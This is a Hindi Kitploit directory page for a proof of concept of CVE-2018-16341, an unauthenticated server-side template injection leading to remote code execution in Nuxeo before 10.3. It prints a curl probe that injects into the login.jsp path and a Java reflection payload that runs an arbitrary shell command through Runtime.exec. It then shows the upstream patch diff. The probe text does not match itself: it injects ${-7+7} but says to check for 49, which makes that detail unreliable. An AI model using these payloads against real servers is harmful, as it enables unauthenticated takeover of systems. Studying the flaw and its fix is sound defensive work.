Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-16341 — CVE-2018-16341 - सर्वर साइड टेम्पलेट इंजेक्शन का उपयोग करके बिना प्रमाणीकरण के Nuxeo रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/mpgn/cve-2018-16341
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubmpgn/cve-2018-16341

CVE-2018-16341

CVE-2018-16341 - सर्वर साइड टेम्पलेट इंजेक्शन का उपयोग करके बिना प्रमाणीकरण के Nuxeo रिमोट कोड निष्पादन

रिपॉजिटरी देखें
241217 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-16341

Nuxeo प्रमाणीकरण बायपास रिमोट कोड निष्पादन < 10.3 SSTI का उपयोग करके - CVE-2018-16341

image

विस्तृत विश्लेषण (अंग्रेजी नहीं):

  • https://www.freebuf.com/vuls/193000.html
  • https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/

सुरक्षा सलाह:

  • https://github.com/nuxeo/nuxeo/commit/eb54a9145c6d8297eba9d7dafc74556e735fa388#diff-cf2094833ef0eea473d03bf6559f1798R97

नोट: Nuxeo 9.x का संस्करण अब Nuxeo द्वारा समर्थित नहीं है लेकिन संस्करण 9.x के लिए एक हॉटफिक्स प्रदान किया गया है। मेरी तरफ से, संस्करण 9.10 असुरक्षित था।


भेद्यता

यह PoC सर्वर साइड टेम्पलेट इंजेक्शन (SSTI) का शोषण करके NuxeoUnknownResource.java फ़ाइल में स्थित RCE प्राप्त करता है।

  • यह जांचने के लिए कि Nuxeo असुरक्षित है या नहीं, बस इस पेलोड को भेजें और संख्या 49 की जांच करें:
root@kitploit:~
curl http://127.0.0.1:8080/nuxeo/login.jsp/pwn${-7+7}.xhtml"
  • इस पेलोड का उपयोग करके RCE प्राप्त करें:
root@kitploit:~
${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("touch /tmp/pwn.txt",null).waitFor()}

सुधार

root@kitploit:~
@@ -94,8 +92,13 @@ public void connect() throws IOException {
 
             @Override
             public InputStream getInputStream() throws IOException {
+                String message = "ERROR: facelet not found";
+                // NXP-25746
+                if (Framework.isDevModeSet() && !path.contains("$") && !path.contains("#")) {
+                    message += " at '" + path + "'";
+                }
                 String msg = "<span><span style=\"color:red;font-weight:bold;\">"
-                        + StringEscapeUtils.escapeHtml4(errorMessage) + "</span><br/></span>";
+                        + StringEscapeUtils.escapeHtml4(message) + "</span><br/></span>";
                 return new ByteArrayInputStream(msg.getBytes());
             }
         }
टूल डाउनलोड करें